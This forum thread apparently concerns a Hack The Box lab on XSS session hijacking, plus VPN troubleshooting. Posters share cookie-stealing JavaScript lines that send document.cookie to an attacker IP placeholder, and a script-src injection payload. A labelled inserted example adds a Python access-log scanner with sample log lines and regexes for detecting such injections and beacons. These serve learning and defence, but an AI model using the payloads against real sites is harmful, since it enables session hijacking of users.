HTB Backend Broken - Cross Site Scripting Session Hijacking - How to Work Around Broken Infrastructure?

I’ve been trying for hours now to get this very simple exercise done. Luckily, the VPN doesn’t work (after wasting a lot of time on trying to get it working properly), so I was able to just type everything directly into the PwnBox.

I’m able to get the script.js to download but after that, the site never reaches back out for index.php. After reading the forums, it seems that I’m not alone. Is there a way to get around this? Because the HTB infrastructure is broken, I think there’s got to be a different way than the obvious, simple solution.

Hey dude! Sorry that you have been having a rough go of it. Paste the XSS line you are injecting into the form so we can help you. Edit: Paste the contents of your script.js too, that might be the issue.

On a separate note, what errors were you getting with the VPN?
-onthesauce

No problem. I used both of these along with the dynamically assigned IP:

document.location='http://IP/index.php?c='+document.cookie;
new Image().src='http://IP/index.php?c='+document.cookie;

These were both tried as the contents of script.js. I even put <script>...stuff...</script> tags around it just in case I was missing something.

Then the XSS payload in the image field was updated to ...imgurl="><script src=http://IP:8080/script.js></script>. The XSS was successful and reached back to the PHP server I instantiated to grab the script. After that, silence. There was never a call to hit index.php (which was also in the same local directory as script.js).

The VPN is as unstable as a one-legged stool. It drops for no reason (even though it’s configured as a VPN Connection in Kali’s network configuration settings). When it does work, it’s a hope and prayer that I will actually be able to connect to the resources. Sometimes they just time out and I get no response; other times it takes an incredible amount of time to load a resource/page; other times it works speedily with no problems. Pentesting is difficult enough as it is - it’s incredibly frustrating to drain even more time and mental bandwidth constantly chasing my tail in order to get basic resources to function properly. I have tried both US1 and US2 for endpoints.

Thanks for reaching out.

Alright, so your script.js looks like it should be good, as long as one of those is in there with the right IP:PORT. And then just make sure the index.php file is created without changes from the code they supply.

The XSS payload can probably look more like just this though. Though it might be a spoiler if you didn’t try all the payloads.

"><script src=http://IP:8080/script.js></script>

Guessing that you already made sure you were using the right field to complete the challenge? Only one field actually works from what I have found.

On the VPN topic. You shouldn't need to configure anything to get the VPN to work. The VPN profile should be downloaded as something like username.ovpn and then you should just open a CLI and run (maybe as root or with sudo) openvpn username.ovpn.

At least that’s all I have ever done when I have used it and it has worked fine for me.

Give that XSS another go and if it still doesn’t work post screenshots of your XSS payload and script.js.
-onthesauce
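For the other side of this exercise, here is an added example (not from the thread or HTB) of what the two requests in the payload above look like in a web server's access log and how a defender would flag them: the injected <script src=...> in the imgurl parameter, and the index.php?c= beacon carrying document.cookie pairs. The log lines, IPs and paths are constructed sample data.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Apache combined-format access log lines (sample data, not from the thread).
# Line 1: the stored-XSS injection into the imgurl field; line 3: the cookie beacon to index.php?c=.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /profile.php?imgurl=%22%3E%3Cscript%20src%3Dhttp%3A%2F%2F10.10.14.2%3A8080%2Fscript.js%3E%3C%2Fscript%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /profile.php?imgurl=http%3A%2F%2Fexample.org%2Fa.png HTTP/1.1" 200 480 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?c=PHPSESSID%3Dabc123%3B%20auth%3D1 HTTP/1.1" 200 0 "http://victim.local/profile.php" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Decoded parameter value containing an external script tag.
SCRIPT_SRC_RE = re.compile(r"<\s*script[^>]*\bsrc\s*=", re.I)
# Decoded parameter value shaped like document.cookie output: name=value pairs separated by "; ".
COOKIE_PAIRS_RE = re.compile(r"^\s*\w+=[^;\s]+(?:;\s*\w+=[^;\s]+)*\s*$")


def query_params(query):
    """Split a raw query string on '&' and percent-decode each key/value (no ';' splitting)."""
    out = []
    for part in query.split("&"):
        if "=" in part:
            key, val = part.split("=", 1)
            out.append((unquote(key), unquote(val)))
    return out


def check_line(line):
    """Return a list of (rule, client_ip, detail) findings for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    ip, _method, target, _status = m.groups()
    findings = []
    for key, val in query_params(urlsplit(target).query):
        if SCRIPT_SRC_RE.search(val):
            findings.append(("script-src-injection", ip, f"{key}={val[:60]}"))
        elif COOKIE_PAIRS_RE.match(val):
            # A GET whose parameter carries cookie pairs is the beacon shape used for session theft;
            # HttpOnly on the session cookie keeps it out of document.cookie in the first place.
            findings.append(("cookie-exfil-beacon", ip, f"{key} -> {val.split(';')[0]}"))
    return findings


def scan(log_text):
    return [f for line in log_text.splitlines() if line.strip() for f in check_line(line)]


if __name__ == "__main__":
    for rule, ip, detail in scan(SAMPLE_LOG):
        print(f"{rule:24} {ip:12} {detail}")
```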

I have been noticing that the new PwnBoxes default to the /root directory, make sure that you are in the default home directory. That just got me when I started it up and did the challenge. Everything seems to be working fine on the backend though.